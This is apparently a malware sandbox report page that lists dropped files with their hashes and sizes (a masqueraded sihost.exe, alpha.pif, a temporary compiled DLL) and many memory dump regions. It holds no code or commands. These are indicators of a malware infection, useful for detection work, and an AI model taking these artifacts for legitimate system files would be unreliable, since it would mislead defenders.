C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ulxgv2lx.wvw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\aw5cq0fe\aw5cq0fe.dll

Filesize
3KB

MD5
2e408cb2400e4e64fc86bed25443526d

SHA1
0330d029475c8e34c9b21fa9cf0be42c92a3deeb

SHA256
7270089019a3e2b8ca6bd5cc73908ed5d7e542eab4feb35e1a6a82aa27d5e7a7

SHA512
5e2c770a8d48c94424b90c5fca97828c2da6430f7397399e2c09a1bc380d94e2eeeb7007de658448cb442801e2a191192ad467f19090107194c82c039817a6b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\iskdvgtuccshfbzowzmcgqormolsaptsve

Filesize
4KB

MD5
05a640e15ef8a6cd5d8db4633bfd2df3

SHA1
23771918cb286dd2ca98c0cc1664931e64cc33c8

SHA256
5b8be3e1fe8438ab1032b5914b5f5b8f544defc91213c6ef3f307b44d2a1951c

SHA512
27d198ecea0bbc12a48ce27c8dbd8a9a445248956623cefd501562cf00162a662e40f020a7276f1f870f324617f419342de9384b71664eea4778866b8bcfd616

Download Submit
C:\Users\Admin\AppData\Roaming\sihost.exe

Filesize
1.6MB

MD5
d245c0efade78fbe55c9d537732dc8fb

SHA1
339657894338cfa9ee994e440443d4fc7ef75368

SHA256
860bb4fd3607ebdb177d9732653f9baeff86192cdf7874c5824ab37b9b61013d

SHA512
562e31c22abf83d57785a5506025847e18a652765f4086ebc1c199b751eeb184a85e9d0ec08289fea1b6beeda0b94e2195a46702aa643ba4f3558a4023af2268

Download Submit
C:\Users\Public\alpha.pif

Filesize
231KB

MD5
d0fce3afa6aa1d58ce9fa336cc2b675b

SHA1
4048488de6ba4bfef9edf103755519f1f762668f

SHA256
4d89fc34d5f0f9babd022271c585a9477bf41e834e46b991deaa0530fdb25e22

SHA512
80e127ef81752cd50f9ea2d662dc4d3bf8db8d29680e75fa5fc406ca22cafa5c4d89ef2eac65b486413d3cdd57a2c12a1cb75f65d1e312a717d262265736d1c2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aw5cq0fe\CSCAEF37203D2584819B593FBAC3246696.TMP

Filesize
652B

MD5
e31bf71a9f8e2ebc642e48659d359363

SHA1
ab20c35c04ec6993497f28bd882ac0fb0fb63697

SHA256
a9fd29c1c84662d1d7c5d7b11757d14ec8429d0d455687b43a8889d7de1d4857

SHA512
3eac3fcd4293c7bd7d7277b146ee1be2f8c2390fd2491ff31e81469a08079c8a96311e4f4cb962dc9fe980b525ff5b8e37c9e68fd43a6720c0423f37c8936261

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aw5cq0fe\aw5cq0fe.0.cs

Filesize
485B

MD5
74f03e78d7b73ad6aa4709e6695db6c2

SHA1
14fc151424d082da9dc8c6310d08ff28b6657686

SHA256
53b979b096d502e2525526211f57212442a0a9bdfd49e14b695541cdfe37d969

SHA512
9b58cdd28852e1bb63d88cb84473175e4e94f81525b3135e0d063d730b8c6c5561f1d1d9b36d2dde8197dbfa185e75bf57d9d95abd39d5e48cceb2e0e2d88e55

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aw5cq0fe\aw5cq0fe.cmdline

Filesize
369B

MD5
5a78c5541c2ff3d21cf4aec0eef1a6a6

SHA1
4381468fc74a64a7817c136d99aef6cc66612614

SHA256
03c7dd657859e3a6e64efbb068a7099650da098bd1cdfd92027d2c2526fc740e

SHA512
e8283982039f76771ecb03d090a3a7a28ba10e86ff356e0a7e3436fcf5f89dc771ad9264a6e78e90b64e1ffcbd8e98fb32636b5a188f74bc15883e34c7b475d7

Download Submit
memory/5412-104-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-119-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-85-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-84-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-86-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-87-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-88-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-89-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-91-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-83-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-92-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-93-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-94-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-95-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-96-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-97-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-114-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-98-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-115-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-99-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-118-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-101-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-102-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-122-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-124-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-103-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-127-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-78-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-79-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-81-0x0000000000400000-0x00000000005A3000-memory.dmp

Filesize
1.6MB

Download
memory/5412-82-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-90-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-100-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-117-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-142-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-140-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-105-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-106-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-129-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-138-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-137-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-136-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-135-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-134-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-133-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-132-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-130-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-128-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-126-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-125-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-123-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-121-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-120-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-116-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-139-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-113-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-112-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-111-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-110-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-109-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-108-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-107-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5412-131-0x0000000002910000-0x0000000003910000-memory.dmp

Filesize
16.0MB

Download
memory/5912-20-0x0000000006750000-0x0000000006782000-memory.dmp

Filesize
200KB

Download
memory/5912-22-0x0000000070BA0000-0x0000000071350000-memory.dmp

Filesize
7.7MB

Download
memory/5912-6-0x0000000005A70000-0x0000000005AD6000-memory.dmp

Filesize
408KB

Download
memory/5912-77-0x0000000070BA0000-0x0000000071350000-memory.dmp

Filesize
7.7MB

Download
memory/5912-0-0x0000000070BAE000-0x0000000070BAF000-memory.dmp

Filesize
4KB

Download
memory/5912-13-0x0000000005B50000-0x0000000005EA4000-memory.dmp

Filesize
3.3MB

Download
memory/5912-67-0x0000000008740000-0x0000000008CE4000-memory.dmp

Filesize
5.6MB

Download
memory/5912-66-0x00000000079F0000-0x0000000007A12000-memory.dmp

Filesize
136KB

Download
memory/5912-65-0x0000000070BA0000-0x0000000071350000-memory.dmp

Filesize
7.7MB

Download
memory/5912-64-0x0000000070BA0000-0x0000000071350000-memory.dmp

Filesize
7.7MB

Download
memory/5912-44-0x0000000007750000-0x0000000007758000-memory.dmp

Filesize
32KB

Download
memory/5912-63-0x0000000070BAE000-0x0000000070BAF000-memory.dmp

Filesize
4KB

Download
memory/5912-19-0x00000000061C0000-0x000000000620C000-memory.dmp

Filesize
304KB

Download
memory/5912-57-0x0000000007750000-0x0000000007758000-memory.dmp

Filesize
32KB

Download
memory/5912-18-0x0000000006180000-0x000000000619E000-memory.dmp

Filesize
120KB

Download
memory/5912-21-0x000000006D460000-0x000000006D4AC000-memory.dmp

Filesize
304KB

Download
memory/5912-7-0x0000000005AE0000-0x0000000005B46000-memory.dmp

Filesize
408KB

Download
memory/5912-5-0x00000000051C0000-0x00000000051E2000-memory.dmp

Filesize
136KB

Download
memory/5912-23-0x000000006D7D0000-0x000000006DB24000-memory.dmp

Filesize
3.3MB

Download
memory/5912-43-0x0000000007800000-0x000000000781A000-memory.dmp

Filesize
104KB

Download
memory/5912-42-0x0000000007720000-0x0000000007734000-memory.dmp

Filesize
80KB

Download
memory/5912-41-0x0000000007710000-0x000000000771E000-memory.dmp

Filesize
56KB

Download
memory/5912-40-0x00000000076E0000-0x00000000076F1000-memory.dmp

Filesize
68KB

Download
memory/5912-39-0x0000000007760000-0x00000000077F6000-memory.dmp

Filesize
600KB

Download
memory/5912-38-0x0000000007540000-0x000000000754A000-memory.dmp

Filesize
40KB

Download
memory/5912-36-0x0000000007B10000-0x000000000818A000-memory.dmp

Filesize
6.5MB

Download
memory/5912-37-0x00000000074D0000-0x00000000074EA000-memory.dmp

Filesize
104KB

Download
memory/5912-33-0x0000000006730000-0x000000000674E000-memory.dmp

Filesize
120KB

Download
memory/5912-35-0x0000000070BA0000-0x0000000071350000-memory.dmp

Filesize
7.7MB

Download
memory/5912-34-0x0000000007160000-0x0000000007203000-memory.dmp

Filesize
652KB

Download
memory/5912-4-0x0000000070BA0000-0x0000000071350000-memory.dmp

Filesize
7.7MB

Download
memory/5912-3-0x0000000070BA0000-0x0000000071350000-memory.dmp

Filesize
7.7MB

Download
memory/5912-2-0x00000000053D0000-0x00000000059F8000-memory.dmp

Filesize
6.2MB

Download
memory/5912-1-0x0000000002BA0000-0x0000000002BD6000-memory.dmp

Filesize
216KB

Download